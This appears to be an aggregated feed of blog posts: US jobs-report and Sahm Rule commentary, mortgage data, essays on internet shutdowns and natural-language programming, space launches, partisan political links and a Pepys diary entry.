I’ll talk about the reasons the gap between Trump’s big boasts and the glum reality matters in a minute. First, however, let’s talk about what we learned from yesterday’s report.

Most importantly, the data show a weak labor market. Employment isn’t falling off a cliff, but job growth has been weak and hasn’t kept pace with the number of people seeking work. The headline unemployment rate in November was 4.6 percent, up from an average of 4 percent in 2024. That number is close to triggering the Sahm Rule, an economic rule of thumb devised by Claudia Sahm, a former economist at the Board of Governors of the Federal Reserve, that has historically been highly successful at identifying the early stages of a recession.

We can’t do a strict application of the Sahm Rule yet because Sahm’s method is based on the average unemployment rate over the past three months. Unfortunately, the shutdown prevented the Bureau of Labor Statistics from collecting key data in October. But if we do an interpolation of October’s unemployment rate by averaging over September’s rate of 4.4% and November’s rate of 4.6%, we can estimate that October’s unemployment rate was 4.5%. And those 3 months of unemployment numbers bring us within a whisker of the unemployment rise that, according to the Sahm Rule, signals that a recession is on the horizon.
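The interpolation and the rule itself are simple enough to check by hand. Here is a sketch using the article's figures; the 12-month low used below is illustrative (the article says 2024 averaged about 4 percent), not an official BLS number:

```python
# September and November unemployment rates from the report;
# October is missing because of the shutdown, so interpolate it.
sept, nov = 4.4, 4.6
oct_est = (sept + nov) / 2  # 4.5, as in the article

# The Sahm Rule compares the 3-month average unemployment rate with
# its low over the preceding 12 months; a rise of 0.5 percentage
# points or more has historically signaled an incipient recession.
three_month_avg = (sept + oct_est + nov) / 3  # 4.5

twelve_month_low = 4.05  # illustrative stand-in, not BLS data
gap = three_month_avg - twelve_month_low
print(f"gap = {gap:.2f} points (trigger is 0.50)")
```

With these numbers the gap comes out just under the 0.5-point trigger, which is what "within a whisker" means here.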

The state of the economy looks even worse if we take a wider view of the labor market. The BLS calculates 6 different measures of unemployment. The most commonly cited number is U-3 — the number of workers who are actively seeking jobs but haven’t found them. But the broadest measure is U-6, which includes underemployed workers stuck in part-time employment and discouraged workers who have temporarily given up job search. And U-6 has risen sharply since January, when Trump took office:

[Chart: U-6 unemployment measure, rising since January. Source: BLS]

Further evidence consistent with a poor and deteriorating job market is data showing that the number of job-seekers who are long-term unemployed – that is, have been unemployed for 27 weeks or more – has risen by almost a third (from 1.45 million to 1.91 million) since 2024. This means that the unemployed are finding it harder to find jobs.

In addition to collecting data from workers, the BLS surveys employers. Interpreting the employer-side numbers is a bit tricky right now, because there are technical challenges in how the BLS models the birth of new firms and the deaths of old ones. None other than Jerome Powell has suggested that official job growth is probably overstated by around 60,000 a month. Yet even if we ignore this likely overstatement of the number of jobs created, yesterday’s numbers are definitely pointing to a troubled economy.

In particular, the Trumpian project of bringing “masculine” blue-collar jobs back is going badly. I’m going to steal a chart from Joey Politano, whose Substack you should be reading:

[Chart: blue-collar employment trends, via Joey Politano]

So while yesterday’s job report wasn’t a cause for outright panic, it does reveal real reasons to worry that the economy is deteriorating.

And Trump owns this economy — because he broke it.

Normally, when a president experiences a troubled economy during his first year, he dispatches his flying monkeys to declare that it’s all his predecessor’s fault. And some Trump officials, like Scott Bessent, are indeed trying to play the blame game. But this standard political tactic is unlikely to work for this president.

First, the economy that Trump inherited when he took office was in much better shape than today’s economy, with lower unemployment combined with faster job growth, and inflation trending down.

Second, Trump’s radical policy changes – huge (illegal) tariffs, mass deportations, big tax cuts (for the rich), benefit cuts (for the poor and middle class), mass layoffs of federal workers, disinvesting in huge green energy projects and aid to farmers — have been clearly damaging to everything besides crypto and AI. It strains credulity – even for the Trump faithful – to claim that we are still in Joe Biden’s economy.

Third, how can Trump blame Biden for a troubled economy when he won’t admit that we have a troubled economy? It’s more than credible that the source of the public’s falling economic confidence is the two Trump “gaps” — the difference between what he promised and what he has delivered, and the gap between what he says is happening and what everyone can see with their own eyes.

Politics aside, it’s important to understand that the bleak economic news we’re getting is only the beginning. “Populist” leaders like Trump — I don’t like the term, but it has come to mean politicians who have disdain for responsible policy and the rule of law — do long-term economic damage. One comprehensive comparative study found that, on average, such leaders leave GDP 10 percent lower after 15 years than it would otherwise have been. So Trumpism is reducing our future living standards.

Trump is going to make a prime-time address to the nation tonight. The details of his speech haven’t been announced, but it’s a good guess that he intends to gaslight Americans yet again, claiming that things are going well. They aren’t.

MUSICAL CODA

Where America’s most prominent short-sellers are placing their bets

We interview three financial sleuths

The local politics of deceased organ donation

 "All politics is local" may not be entirely true, but local politics doesn't end at death.

MedPage Today has the story: 

Senators Urge More Localized Use of Donor Organs — "Too many of our organs are leaving" the geographic area, says Sen. Roger Marshall, MD
by Joyce Frieden

"More needs to be done to make sure donated organs are transplanted to recipients within the local geographic area whenever possible, several senators said Thursday at a hearing on the future of the organ procurement and transplantation network.

"The Midwest, where I'm from ... is famous that we have a higher organ donor rate than the [East or West] coasts do typically," said Sen. Roger Marshall, MD (R-Kansas). "And you know, there's a concern that too many of our organs are leaving the Midwest."
 

California facts of the day

At Berkeley, as recently as 2015, white male hires were 52.7 percent of new tenure-track faculty; in 2023, they were 21.5 percent. UC Irvine has hired 64 tenure-track assistant professors in the humanities and social sciences since 2020. Just three (4.7 percent) are white men. Of the 59 Assistant Professors in Arts, Humanities and Social Science appointed at UC Santa Cruz between 2020-2024, only two were white men (3 percent).

Here is the essay by Jacob Savage that everyone is talking about.

The post California facts of the day appeared first on Marginal REVOLUTION.


Deliberate Internet Shutdowns

For two days in September, Afghanistan had no internet. No satellite failed; no cable was cut. This was a deliberate outage, mandated by the Taliban government. It followed a more localized shutdown two weeks prior, reportedly instituted “to prevent immoral activities.” No additional explanation was given. The timing couldn’t have been worse: communities still reeling from a major earthquake lost emergency communications, flights were grounded, and banking was interrupted. Afghanistan’s blackout is part of a wider pattern. Just since the end of September, there were also major nationwide internet shutdowns in Tanzania and Cameroon, and significant regional shutdowns in Pakistan and Nigeria. In all cases but one, authorities offered no official justification or acknowledgment, leaving millions unable to access information, contact loved ones, or express themselves through moments of crisis, elections, and protests.

The frequency of deliberate internet shutdowns has skyrocketed since the first notable example in Egypt in 2011. Together with our colleagues at the digital rights organisation Access Now and the #KeepItOn coalition, we’ve tracked 296 deliberate internet shutdowns in 54 countries in 2024, and at least 244 more in 2025 so far.

This is more than an inconvenience. The internet has become an essential piece of infrastructure, affecting how we live, work, and get our information. It’s also a major enabler of human rights, and turning off the internet can worsen or conceal a spectrum of abuses. These shutdowns silence societies, and they’re getting more and more common.

Shutdowns can be local or national, partial or total. In total blackouts, like Afghanistan or Tanzania, nothing works. But shutdowns are often targeted more granularly. Cellphone internet could be blocked, but not broadband. Specific news sites, social media platforms, and messaging systems could be blocked, leaving overall network access unaffected—as when Brazil shut off X (formerly Twitter) in 2024. Sometimes bandwidth is just throttled, making everything slower and unreliable.

Sometimes, internet shutdowns are used in political or military operations. In recent years, Russia and Ukraine have shut off parts of each other’s internet, and Israel has repeatedly shut off Palestinians’ internet in Gaza. Shutdowns of this type happened 25 times in 2024, affecting people in 13 countries.

Reasons for the shutdowns are as varied as the countries that perpetrate them. General information control is just one. Shutdowns often come in response to political unrest, as governments try to prevent people from organizing and getting information; Panama had a regional shutdown this summer in response to protests. Or during elections, as opposition parties utilize the internet to mobilize supporters and communicate strategy. Belarusian president Alyaksandr Lukashenko, who has ruled since 1994, reportedly disabled the internet during elections earlier this year, following a similar move in 2020. But they can also be more banal. Access Now documented countries disabling parts of the internet during student exam periods at least 16 times in 2024, including Algeria, Iraq, Jordan, Kenya, and India.

Iran’s shutdowns in 2022 and June of this year are good examples of a highly sophisticated effort, with layers of shutdowns that end up forcing people off the global internet and onto Iran’s surveilled, censored national intranet. India, meanwhile, has been the world shutdown leader for many years, with 855 distinct incidents. Myanmar is second with 149, followed by Pakistan and then Iran. All of this information is available on Access Now’s digital dashboard, where you can see breakdowns by region, country, type, geographic extent, and time.

There was a slight decline in shutdowns during the early years of the pandemic, but they have increased sharply since then. The reasons are varied, but a lot can be attributed to the rise in protest movements related to economic hardship and corruption, and general democratic backsliding and instability. In many countries today, shutdowns are a knee-jerk response to any form of unrest or protest, no matter how small.

A country’s ability to shut down the internet depends a lot on its infrastructure. In the US, for example, shutdowns would be hard to enforce. As we saw when discussions about a potential TikTok ban ramped up two years ago, the complex and multifaceted nature of our internet makes it very difficult to achieve. However, as we’ve seen with total nationwide shutdowns around the world, the ripple effects in all aspects of life are immense. (Remember the effects of just a small outage—CrowdStrike in 2024—which crippled 8.5 million computers and cancelled 2,200 flights in the US alone?)

The more centralized the internet infrastructure, the easier it is to implement a shutdown. If a country has just one cellphone provider, or only two fiber optic cables connecting the nation to the rest of the world, shutting them down is easy.

Shutdowns are not only more common, but they’ve also become more harmful. Unlike in years past, when the internet was a nice option to have, or perhaps when internet penetration rates were significantly lower across the Global South, today the internet is an essential piece of societal infrastructure for the majority of the world’s population.

Access Now has long maintained that denying people access to the internet is a human rights violation, and has collected harrowing stories from places like Tigray in Ethiopia, Uganda, Annobon in Equatorial Guinea, and Iran. The internet is an essential tool for a spectrum of rights, including freedom of expression and assembly. Shutdowns make documenting ongoing human rights abuses and atrocities more difficult or impossible. They are also impactful on people’s daily lives, business, healthcare, education, finances, security, and safety, depending on the context. Shutdowns in conflict zones are particularly damaging, as they impact the ability of humanitarian actors to deliver aid and make it harder for people to find safe evacuation routes and civilian corridors.

Defenses on the ground are slim. Depending on the country and the type of shutdown, there can be workarounds. Everything, from VPNs to mesh networks to Starlink terminals to foreign SIM cards near borders, has been used with varying degrees of success. The tech-savvy sometimes have other options. But for most everyone in society, no internet means no internet—and all the effects of that loss.

The international community plays an important role in shaping how internet shutdowns are understood and addressed. World bodies have recognized that reliable internet access is an essential service, and could put more pressure on governments to keep the internet on in conflict-affected areas. But while international condemnation has worked in some cases (Mauritius and South Sudan are two recent examples), countries seem to be learning from each other, resulting in both more shutdowns and new countries perpetrating them.

There’s still time to reverse the trend, if that’s what we want to do. Ultimately, the question comes down to whether or not governments will enshrine both a right to access information and freedom of expression in law and in practice. Keeping the internet on is a norm, but the trajectory from a single internet shutdown in 2011 to 2,000 blackouts 15 years later demonstrates how embedded the practice has become. The implications of that shift are still unfolding, but they reach far beyond the moment the screen goes dark.

This essay was written with Zach Rosson, and originally appeared in Gizmodo.

MBA: Mortgage Applications Decrease in Latest Weekly Survey

From the MBA: Mortgage Applications Decrease in Latest MBA Weekly Survey
Mortgage applications decreased 3.8 percent from one week earlier, according to data from the Mortgage Bankers Association’s (MBA) Weekly Mortgage Applications Survey for the week ending December 12, 2025.

The Market Composite Index, a measure of mortgage loan application volume, decreased 3.8 percent on a seasonally adjusted basis from one week earlier. On an unadjusted basis, the Index decreased 5 percent compared with the previous week. The Refinance Index decreased 4 percent from the previous week and was 86 percent higher than the same week one year ago. The seasonally adjusted Purchase Index decreased 3 percent from one week earlier. The unadjusted Purchase Index decreased 7 percent compared with the previous week and was 13 percent higher than the same week one year ago.

“Mortgage rates inched up last week following the FOMC meeting, as investors interpreted the comments to signal that we are near the end of this rate cutting cycle. As a result, mortgage applications declined slightly,” said Mike Fratantoni, MBA’s SVP and Chief Economist. “Purchase application volume typically drops off quickly at the end of the year, and this shifts the mix of the business, with the refinance share reaching 59 percent last week, the highest level since September. However, refinance activity has remained mostly the same for the past month as rates continue to hold at around the same narrow range.”
...
The average contract interest rate for 30-year fixed-rate mortgages with conforming loan balances ($806,500 or less) increased to 6.38 percent from 6.33 percent, with points increasing to 0.62 from 0.60 (including the origination fee) for 80 percent loan-to-value ratio (LTV) loans.
emphasis added
Mortgage Purchase Index Click on graph for larger image.

The first graph shows the MBA mortgage purchase index.

According to the MBA, purchase activity is up 13% year-over-year unadjusted. 

Red is a four-week average (blue is weekly).  

Purchase application activity is still depressed, but solidly above the lows of 2023 and above the lowest levels during the housing bust.  

Mortgage Refinance Index
The second graph shows the refinance index since 1990.

The refinance index increased from the bottom as mortgage rates declined, but is down from the recent peak in September.

What should I ask Joanne Paul?

Yes I will be doing a Conversation with her.  From the Google internet:

Joanne Paul is a writer, broadcaster, consultant, and Honorary Senior Lecturer in Intellectual History at the University of Sussex. A BBC/AHRC New Generation Thinker, her research focuses on the intellectual and cultural history of the Renaissance and Early Modern periods…

She has a new book out Thomas More: A Life.

Here is her home page.  Here is Joanne on Twitter.  She has many videos on the Tudor period, some with over one million views.

So what should I ask her?

The post What should I ask Joanne Paul? appeared first on Marginal REVOLUTION.

       


How harmful is the decline in long-form reading?

That is the theme of my latest Free Press column, here is one excerpt:

Oral culture, in contrast, tends to be more fluid, harder to evaluate and verify, more prone to rumor, and it has fewer gatekeepers. Those features have their advantages, as a good stand-up comedian will get louder laughs than a witty author. Or an explanation from YouTube, with moving visuals, may stick in our minds more than a turgid passage from a textbook. We also just love talking, and listening, as those modes of communication reach back into human history much further than reading and writing do. Speech is part of how we bond with each other. Still, if any gross generalization can be made, it is that oral culture makes objectivity and analytic thought harder to establish and maintain.

Given this background, both the good and the bad news is that the dominance of print culture has been in decline for a long time. Radio and cinema both became major communications media in the 1920s, and television spread in the 1950s. Those major technological advances have commanded the regular attention of billions, and still do so. Earlier in the 20th century, it suddenly became a question whether you take your ideas from a book or from the radio. And this was not always a welcome development, as Hitler’s radio speeches persuaded more Germans than did his poorly constructed, unreadable Mein Kampf.

The fact that books, newspapers, and reading still are so important reflects just how powerful print has been. How many other institutions can be in relative decline for over a hundred years, and still have such a hold over our hearts and minds?

The optimistic interpretation of our situation is that reading longer works has been in decline for a long time, and overall our civilization has managed the transition fairly well. Across history we have had various balances of written and oral cultures, and if some further rebalancing is required in the direction of the oral, we should be able to make that work, just as we have done in the past. The rise of television, whatever you may think of it, did not do us in.

A second and more pessimistic diagnosis is that print and reading culture has been hanging by a thread, and current and pending technological advances are about to give that thread its final cut. The intellectual and cultural apocalypse is near. Even if your family thinks of itself as well-educated, your kids will grow up unable to work their way through a classic novel. They will watch the Lord of the Rings movies, but never pick up the books. As a result, they are likely to have less scientific and analytic objectivity, and they will embody some of the worst and most volatile aspects of TikTok culture. They will, however, be able to sample large numbers of small bits of information, or sometimes misinformation, in a short period of time.

There is much more at the link.

The post How harmful is the decline in long-form reading? appeared first on Marginal REVOLUTION.

       


If we were all Japanese pond frogs, we’d have nothing to fear from murder hornets. “When I watched the recorded videos in slow motion, the frogs were clearly stung multiple times yet showed no apparent injury or mortality.”

“The Trump administration’s vision for the United States is one of a white Christian nation. And the path to accomplish it is through the exclusion and removal of all who do not fit that vision — in other words, through ethnic cleansing.”

The $4.3 billion space telescope Trump tried to cancel is now complete

A few weeks ago, technicians inside a cavernous clean room in Maryland made the final connection to complete assembly of NASA’s Nancy Grace Roman Space Telescope.

Parts of this new observatory, named for NASA’s first chief astronomer, recently completed a spate of tests to ensure it can survive the shaking and intense sound of a rocket launch. Engineers placed the core of the telescope inside a thermal vacuum chamber, where it withstood the airless conditions and extreme temperature swings it will see in space.

Then, on November 25, teams at NASA’s Goddard Space Flight Center in Greenbelt, Maryland, joined the inner and outer portions of the Roman Space Telescope. With this milestone, NASA declared the observatory complete and on track for launch as soon as fall 2026.


On the success of 'natural language programming'

Specifications, in plain speech.

I believe that specification is the future of programming.

Over the last four decades, we’ve seen the practice of building programs and software systems grow closer and closer to the practice of specification. Details of the implementation, from layout in memory and disk, to layout in entire data centers, to algorithm and data structure choice, have become more and more abstract. Most application builders aren’t writing frameworks, framework builders aren’t building databases, database builders aren’t designing protocols, protocol designers aren’t writing kernels, and so on. Our modern software world is built on abstractions.

Significant advancements are made, from time to time, by cutting through these abstractions. But still, the abstractions dominate, and will continue to.

The practice of programming has become closer and closer to the practice of specification. Of crisply writing down what we want programs to do, and what makes them right. The how is less important.

I believe that natural language will form the core of the programming languages of the future.

The Ambiguity Problem

The most common objection to this view is that natural language is ambiguous. Its exact meaning is potentially unclear, and highly dependent on context. This is a real problem.

For example, in The Bug in Paxos Made Simple, I look at a common bug in implementations of Paxos caused directly by the ambiguity of natural language.

Pointing out this ambiguity isn’t criticizing [Lamport’s] writing, but rather reminding you about how hard it is to write crisp descriptions of even relatively simple distributed protocols in text.

As Lamport says:

Prose is not the way to precisely describe algorithms.

Perhaps the most famous statement of this problem is Dijkstra’s from On the foolishness of “natural language programming”:

When all is said and told, the “naturalness” with which we use our native tongues boils down to the ease with which we can use them for making statements the nonsense of which is not obvious.

Dijkstra’s argument goes beyond pointing out the ambiguity and imprecision of natural language; it also points out the power of symbolic tools. All of these arguments are true. Reasoning using the symbolic and formal tools of mathematics is indeed powerful. It is tempting to poke holes in this argument by pointing out that most programs don’t need precise specification, and that there’s a large opportunity for natural language to specify those programs. That observation is true, but doesn’t go far enough.

Instead, I argue that ambiguity doesn’t doom natural language programming for one simple reason: almost all programs are already specified in natural language. And always have been.

Where Do Programs Come From?

Programs come from requirements from people, and people specify the need for those programs using that least precise of tools: natural language. We talk to customers, to stakeholders, to product managers, and other consumers of our programs and ask them what they want. Sometimes, we’ll get a precise specification, like an OpenAPI spec or an RFC. More often, we’ll get something fuzzy, incomplete, and ambiguous.

That tends to work for two reasons. First, we’ll apply context. Common sense. Our understanding from similar successful projects about the requirements that users have in common. Or maybe even formal compliance requirements. Second, we’ll have a conversation. Hey, I didn’t quite understand your requirement for the daily average, do you want the mean or median? Or can you make it so I don’t lose data even if a machine fails? Software teams and organizations have these conversations continuously.
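That mean-or-median question is not pedantic: on skewed data the two diverge sharply, which is exactly what the clarifying conversation surfaces. A tiny illustration with hypothetical latency numbers (the data and names here are mine, not from the essay):

```python
import statistics

# Hypothetical daily request latencies in ms; the single outlier
# makes the choice of "average" matter a great deal.
latencies = [12, 14, 15, 16, 18, 950]

mean = statistics.mean(latencies)      # pulled up by the outlier
median = statistics.median(latencies)  # robust to it

print(f"mean={mean:.1f}ms median={median:.1f}ms")
# prints "mean=170.8ms median=15.5ms"
```

Two readings of the same fuzzy word "average", two very different dashboards; only the conversation tells you which one the customer meant.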

This is how software is built professionally, how software construction is taught, and how open source and even hobby communities build their systems.

Sometimes, these conversations will become formal. A snippet of code. A SQL query. An example. But most often they’re informal. A conversation. A napkin sketch. Some hand-waving over lunch.

LLMs allow us to include our computers in these conversations.

Specifications are Loops

Vibe coding is the ultimate embodiment of this: building a specification for a program based on a conversation of “yes, and” and “no, but.” A closed loop of a developer and an AI model or agent having a conversation about how to drive a code base forward. This conversation is much richer than a simple natural language programming language because of the loop. The loop is where the context is built up, and the magic happens.

Kiro-style spec-driven development is similar. There, the loop is a little more formal, a little less ad-hoc. But the fundamental shape of the conversation is a similar one. Property-based testing adds a little bit of structure to this loop, and helps make sure it’s ratcheting forward as it goes.
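A hand-rolled sketch of that property loop, assuming a hypothetical `daily_average` function under test (a real project would reach for a library like Hypothesis; this just shows the shape of the ratchet):

```python
import random

def daily_average(xs):
    # The implementation under test: the spec conversation settled on the mean.
    return sum(xs) / len(xs)

def check_property(trials=1000):
    # Property extracted from the conversation: the average always lies
    # between the minimum and maximum observation.
    rng = random.Random(0)  # seeded so the check is reproducible
    for _ in range(trials):
        xs = [rng.uniform(-1e6, 1e6) for _ in range(rng.randint(1, 50))]
        avg = daily_average(xs)
        assert min(xs) <= avg <= max(xs), (xs, avg)
    return True

print(check_property())
```

Each trip around the loop can add another property like this one, so the accumulated checks keep earlier agreements from silently regressing.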

This is, I think, the fundamental thing that most of the takes on natural language and programming miss. They think we’re solving a one-shot problem of going from an ambiguous, messy, human specification to a precise and perfect program. They see the trips around the loop as failures. I believe that the trips around the loop are fundamental to the success of the whole enterprise. They’re what we’ve been doing all along.

To quote from the Agile Manifesto, an artifact of a similar time of change in our industry:

Individuals and interactions over processes and tools

The loop is the interaction.

Getting the Answer Right

Now, this answer is easy enough for programs whose results don’t matter all that much. Which is most programs. But there are some cases where precise and exact answers matter a great deal. They could matter because other layers of the system depend on them (as with the safety properties of Paxos), because of legal or compliance requirements, because of security requirements, or for many other reasons. More importantly, it may not be obvious that the current answer is wrong. That another trip around the loop is needed.

What do we do then, huh?

One thing we can do is slip back into symbolic representations. Back to writing Rust, SQL, or TLA+. We shouldn’t see these cases as failures, and should expect to have these tools in our toolbox for the foreseeable future. Using them is not a failure because we’ve mostly avoided the need for them, and gotten the efficiency gains of bringing our programming practice closer to our customers and businesses. Piercing through the layers will always be a thing.

But there’s another, rather tantalizing, direction. Here, let’s turn to a paper by some colleagues of mine, A Neurosymbolic Approach to Natural Language Formalization and Verification. Here, neurosymbolic refers to the idea that we can effectively combine the ambiguous, loosey-goosey natural language LLM world with the precise world of symbolic reasoning inside the machine to provide highly accurate results not achievable via either technique alone. In this case, highly accurate results on policy following based on a natural language specification.

They resolve ambiguities in text by explicitly including the customer (the specifier) in the feedback loop, such as by having the customer review a restatement of the policy:

Manual inspection allows users to review their generated policy model and verify its correctness, similar to code review in software development. Users can examine the policy variables with their types and descriptions, as well as the logical rules themselves.

Here, the policy model could be entirely formal (SMT-LIB), or semi-formal in structured natural language: “Let me say that back to you to check I got it.”

They’re also applying other techniques, like looking for internal inconsistencies in specifications and asking users to proactively resolve them. Humans can also review automatically generated test cases, both at the individual case level and at the property level.
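As a toy sketch of what a reviewable policy model might look like, here is a hypothetical natural-language policy (“refunds within 30 days, unless the item is final sale”) formalized as a predicate, with generated-style test cases a human could inspect. The policy and all the names are illustrative, not from the paper:

```python
from dataclasses import dataclass

@dataclass
class Claim:
    days_since_purchase: int
    final_sale: bool

def refund_allowed(c: Claim) -> bool:
    # Formalization of the (hypothetical) natural-language policy:
    # "refunds within 30 days, unless the item is final sale".
    return c.days_since_purchase <= 30 and not c.final_sale

# Generated-style test cases a human reviewer could inspect; note how the
# boundary case forces the specifier to resolve an ambiguity.
cases = [
    (Claim(10, False), True),   # well inside the window
    (Claim(30, False), True),   # boundary: is day 30 "within 30 days"?
    (Claim(31, False), False),  # just outside
    (Claim(5, True), False),    # final sale overrides recency
]
for claim, expected in cases:
    assert refund_allowed(claim) == expected
print("policy model consistent with reviewed cases")
```

The boundary case (day 30) is exactly the kind of ambiguity the review step is meant to surface: the customer either blesses the `<=` or corrects it, and that decision becomes part of the spec.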

This is, again, the power of the conversation. A specification isn’t created single-shot from the ambiguous language, but rather extracted after some back-and-forth. This seems to me like the programming model of the future. It’s also the one we’ve always used.

Specifications are Context

Once a specification has been developed, it takes on a second life, as a new piece of context that future specifications can refer to. This is a technique as old as computing, and much, much older. Once we’ve established a common understanding, whether it’s about what we mean by average or what we mean by authenticated, we can then use those terms in future communication. When we talk to our customers about a feature request, we don’t start from zero every time. Instead, we use our common understanding of the system as-is, and have a short conversation about what changes we want. Just like I don’t provide you directions to the restaurant down the road starting at your birth place.

Back to Dijkstra:

From one gut feeling I derive much consolation: I suspect that machines to be programmed in our native tongues —be it Dutch, English, American, French, German, or Swahili— are as damned difficult to make as they would be to use.

Today, in the year 2025, we’ve built those machines to be programmed in our native tongues. We’ve made significant progress on how to use them, and are seeing significant returns from that effort. There’s more work to learn how to use them efficiently, but there’s no doubt in my mind that we’ll be using them. The future of programming looks like the past of programming: a natural language conversation, a feedback loop, with the occasional descent into mathematical precision.

When we succeed, we’ll bring the power of computing to more places, more people, and more problems. I can’t wait to see where we go from here.

SpaceX flies Starlink mission using Falcon 9 booster flying for a 30th time

A SpaceX Falcon 9 rocket lifts off from Launch Complex 39A at NASA’s Kennedy Space Center to begin the Starlink 6-99 mission on Dec. 17, 2025. Image: Adam Bernstein / Spaceflight Now

Update Dec. 17, 6:30 p.m. EST (2330 UTC): Adding comments from SpaceX’s vice president of launch.

For the third time, SpaceX launched one of its Falcon 9 rocket boosters on a 30th flight, continuing along the path to certifying its rockets for use up to 40 times.

The nine Merlin 1D engines at the base of the booster, tail number 1063, roared to life at 7:27 a.m. PST (10:27 a.m. EST / 1527 UTC) Wednesday morning. The flight from Vandenberg Space Force Base in California was the second of two planned flights that day, following a liftoff from NASA’s Kennedy Space Center in Florida less than two hours earlier, at 8:42 a.m. EST (1342 UTC).

Taking a south-easterly trajectory upon leaving the launch pad, B1063 separated from the rocket’s upper stage less than three minutes into the mission. About six minutes later it was standing atop the SpaceX drone ship, ‘Of Course I Still Love You’, positioned in the Pacific Ocean.

SpaceX has at least one more launch scheduled from Vandenberg before the end of the year. On Dec. 27, it’s slated to launch the COSMO-SkyMed Second Generation mission for the Italian Ministry of Defence and the Italian Space Agency.

Assuming no other launches crop up before the new year, SpaceX will close out 2025 with a total of 167 Falcon 9 rocket launches. This was affirmed Wednesday evening in a social media post from Kiko Dontchev, SpaceX Vice President of Launch.

Wednesday: Architecture Billings Index

Mortgage Rates Note: Mortgage rates are from MortgageNewsDaily.com and are for top tier scenarios.

Wednesday:
• At 7:00 AM ET, The Mortgage Bankers Association (MBA) will release the results for the mortgage purchase applications index.

• During the day: The AIA's Architecture Billings Index for November (a leading indicator for commercial real estate).

Links 12/16/25

Links for you. Science:

The U.S. Is Funding Fewer Grants in Every Area of Science and Medicine
FDA’s big change to how vaccines will get approved
Colorado has wolves again for the first time in 80 years. Why are they dying?
‘The last plant left’: can Rapa Nui’s extinct tree be resurrected?
Rare Gecko Species Rediscovered in Galapagos Following Island Restoration Success
Diabetic Man With Gene-Edited Cells Produces His Own Insulin—No Transplant Drugs Required
Cancelling mRNA studies is the highest irresponsibility

Other:

It’s time to talk about Donald Trump’s health (again)
This is what a white supremacist administration looks like
Janeese Lewis George launches bid for D.C. mayor. The progressive lawmaker has big plans, but faces political and practical obstacles.
The Conservative Grievance Business Is Always Hiring
FBI under Kash Patel has become ‘internally paralyzed by fear’, new report reveals
Republican mayor in Kansas facing deportation over voter fraud
Why This Nineties High School Punk Band Is Suddenly Bigger Than Ever. Everyone Asked About You broke up and went about their lives. Nearly three decades later, they’re touring the U.S. thanks to some Japanese fans unearthing their old teenage music
Suspended FEMA workers who criticized Trump administration got their jobs back — until DHS leaders found out
UAB physician and AI innovator may leave US due to parents’ immigration limbo
D.C. restaurants, hotels suffered during Trump takeover, per new data
DOGE Isn’t Dead. Here’s What Its Operatives Are Doing Now
A Maryland mayor removes rainbow crosswalks, citing neutrality concerns (“A conservative, Taylor is a bit of an outlier in Salisbury. He won the 2023 mayoral race by 50 votes when two more liberal-leaning candidates split their votes.”)
I’m In Charge
12-Story Micro-Unit Development Pitched For 15th Street Church
Changing the FDA’s Vaccine Approval Process Could Threaten COVID, Flu Protection for Children
N.Y. Law Could Set Stage for A.I. Regulation’s Next ‘Big Battleground’
Trump tariffs gut manufacturing as jobs shrink for 9 months straight
Trump Boat Bombings Suddenly on Shakier Ground as Damning Info Emerges
Olivia Nuzzi’s Tell-Nothing Memoir (brutal)
Trump’s ugly Thanksgiving meltdown: It’s getting so bad that even Republicans are starting to notice.
Grok Says It Would Kill Every Jewish Person on the Planet to Save Elon Musk: A “classic trolley problem,” according to Grok.
A Serious Journalism Scandal Hiding Inside a Frivolous Sexual One
Settler outposts spread among West Bank villages and fuel fear of more attacks
Dem. Senator Gallego’s Leaked Texts Echo Far-Right Gender Panic And Misogyny (more here)
Yeah, what is ‘Post-Liberalism’ anyway?
The old deal is dead. America needs a new one
Kash Patel Is Under Investigation for Using FBI Jet as Private Uber
ICE Arrested and Separated Chinese Father From 6-Year-Old Son, Advocates Say
How the CIA Learned to Stop Worrying and Embrace Partisanship
Way-No-No-No!!! Drives Into Police Standoff

So Mean and Petty

I was going to publish a post today about how the pettiness of the Trump administration is best illustrated by its deadnaming of a trans former HHS official*. No, it’s not as dangerous (or deadly) as other Trump administration actions, but it’s the kind of thing for which someone should be named and shamed. And then, Sunday night, Trump uttered a vile and disgusting statement, which arguably could be viewed as a violent threat too, about Rob and Michelle Reiner’s deaths.

If there’s any consolation to be had, this seems to be blowing up in Trump’s face, though that didn’t stop him from doubling down yesterday. There might be a level of meanness and pettiness that the body politic just can’t ignore or stomach. While Trump obviously sets the tone, as the deadnaming indicates, this malignant behavior is marbled throughout the entire Trump administration, and those involved in such foul behavior should be shamed and made outcast (even if it’s not illegal). There is no balm in Gilead to heal those sin sick souls.

Anyway, here’s a funny sketch featuring Rob Reiner and Carroll O’Connor (apparently, it was at least partially improvised):

*I delayed writing about that because I was going to write about the Trump administration’s cancelling plans from the Biden administration to mint quarters about abolition (of slavery) and women’s suffrage. Being assholes happens like clockwork for these putzes.

Tuesday 16 December 1662

Up and to the office, and thither came Mr. Coventry and Sir G. Carteret, and among other business was Strutt’s the purser, against Captn. Browne, Sir W. Batten’s brother-in-law, but, Lord! though I believe the Captain has played the knave, though I seem to have a good opinion of him and to mean him well, what a most troublesome fellow that Strutt is, such as I never did meet with his fellow in my life. His talking and ours to make him hold his peace set my head off akeing all the afternoon with great pain.

So to dinner, thinking to have had Mr. Coventry, but he could not go with me; and so I took Captn. Murford. Of whom I do hear what the world says of me; that all do conclude Mr. Coventry, and Pett, and me, to be of a knot; and that we do now carry all things before us; and much more in particular of me, and my studiousnesse, &c., to my great content.

After dinner came Mrs. Browne, the Captain’s wife, to see me and my wife, and I showed her a good countenance, and indeed her husband has been civil to us, but though I speak them fair, yet I doubt I shall not be able to do her husband much favour in this business of Strutt’s, whom without doubt he has abused.

So to the office, and hence, having done some business, by coach to White Hall to Secretary Bennet’s, and agreed with Mr. Lee to set upon our new adventure at the Tower to-morrow. Hence to Col. Lovelace in Cannon Row about seeing how Sir R. Ford did report all the officers of the navy to be rated for the Loyal Sufferers, but finding him at the Rhenish wine-house I could not have any answer, but must take another time. Thence to my Lord’s, and having sat talking with Mr. Moore bewailing the vanity and disorders of the age, I went by coach to my brother’s, where I met Sarah, my late mayde, who had a desire to speak with me, and I with her to know what it was, who told me out of good will to me, for she loves me dearly, that I would beware of my wife’s brother, for he is begging or borrowing of her and often, and told me of her Scallop whisk, and her borrowing of 50s. for Will, which she believes was for him and her father. I do observe so much goodness and seriousness in the mayde, that I am again and again sorry that I have parted with her, though it was full against my will then, and if she had anything in the world I would commend her for a wife for my brother Tom. After much discourse and her professions of love to me and all my relations, I bade her good night and did kiss her, and indeed she seemed very well-favoured to me to-night, as she is always.

